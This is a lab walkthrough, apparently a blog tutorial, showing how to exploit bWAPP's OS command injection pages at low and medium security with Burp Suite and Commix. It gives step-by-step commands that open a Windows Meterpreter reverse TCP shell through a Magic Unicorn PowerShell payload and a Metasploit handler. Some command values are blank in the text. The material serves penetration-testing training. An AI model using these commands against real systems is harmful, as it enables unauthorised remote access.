Powershell Injection Attacks using Commix and Magic Unicorn
Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands. Source:
Xampp/Wamp Server
Kali Linux: Burp suite, Commix tool
You need to install bWAPP lab in your XAMPP or WAMP server, for this you can visit the link web Pentest lab setup using bwapp here.
Our task is to get meterpreter shell through os command injection-Blind attack using bWAPP
Start service Apache and Mysql in Xampp or Wamp server. Let’s open the local host address in browser as I am using Enter user and password bee and bug respectively.
My task is to bypass all three security level in bWAPP through os command injection.
Let start!!!!
Set the security level low, from list box choose your bug select os command injection-Blind now and click on hack.
Type your IP in the text field and just after that start the burp suite in kali Linux. Don’t forget to set proxy in your browser while using the burp suite.
To capture the cookie of bWAPP click on proxy tag then click to inception is on button, come back to bWAPP and now click to PING button.
Look at image you will find that I have got the details.
Open the terminal in kali Linux and type the commix command.
From intercepted data under burp suite copy the referrer, cookie and target and use this in the following command
commix –url=”” –data=”target=target=” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=5m82jlcacsvb2rfmn73gt3egi2″
This command will execute the commix tool in terminal which automatically perform command injection attack using url and cookie information in bWAPP.
Commix found the target seems injectable via blind injection techniques and will further ask for pseudo terminal.
Type ‘y’ to resumed the classic injection point and to pseudo terminal shell
Here we got the commix os shell but our aim is meterpreter shell for that we need to type following commands.
commix(os_shell) > reverse_tcp
commix(reverse_tcp) > set LHOST
commix(reverse_tcp) > set LPORT 4444
Option asks by commix to set backdoor for connection Type ‘2’ for other reverse TCP shells.
commix(reverse_tcp) > 2
Option asks by commix to set payload Type ‘7’ to use a Windows meterpreter reverse TCP shell.
commix(reverse_tcp) >7
Option asks by commix to set powershell injection attack Type ‘2’ to use TrustedSec’s Magic Unicorn.
commix(reverse_tcp) >2
Above step will geneterate a shellcode marked above in the image copy the whole shellcode “msfconsole -r /usr/share/commix/src/thirdparty/unicorn/unicorn.rc” and paste in new terminal which will start multi handler by its own.
Once metasploit framework gets loaded and starts the payload handler; come back to your previous terminal and press enter. As it is mention in image.
Luckly!! We succeeded in our task we have got meterpreter shell.
Same task we going to perform with same process but with another type of vulnerability. Set the security level low, from list box choose your bug select os command injection now and click on hack.
Type your IP in the DNS lookup field and just after that start the burp suite and set manual proxy of browser. Click on proxy tag then click to inception is on button, come back to bWAPP and now click to Lookup.
Open the terminal in kali Linux and type the commix command.
commix –url=”” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=1; PHPSESSID=79egt1piglgkadfnaa6dujass7″ –data=”target=”
Type ‘y’ to resumed the classic injection point and to pseudo terminal shell
Here we got the commix os shell but our aim is meterpreter shell for that we need to type following commands.
commix(os_shell) > reverse_tcp
commix(reverse_tcp) > set LHOST
commix(reverse_tcp) > set LPORT 4444
Option asks by commix to set backdoor for connection Type ‘2’ for other reverse TCP shells.
commix(reverse_tcp) > 2
Option asks by commix to set payload Type ‘7’ to use a Windows meterpreter reverse TCP shell.
commix(reverse_tcp) >7
Option asks by commix to set powershell injection attack Type ‘2’ to use TrustedSec’s Magic Unicorn.
commix(reverse_tcp) >2
Above step will geneterate a shellcode marked above in the image copy the whole shellcode “msfconsole -r /usr/share/commix/src/thirdparty/unicorn/unicorn.rc” and paste in new terminal which will start multi handler by its own.
Once metasploit framework gets loaded and starts the payload handler come; back to your previous terminal and press enter. As it is mention in image.
Luckly!! Again we succeeded in our task we have got meterpreter shell.
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here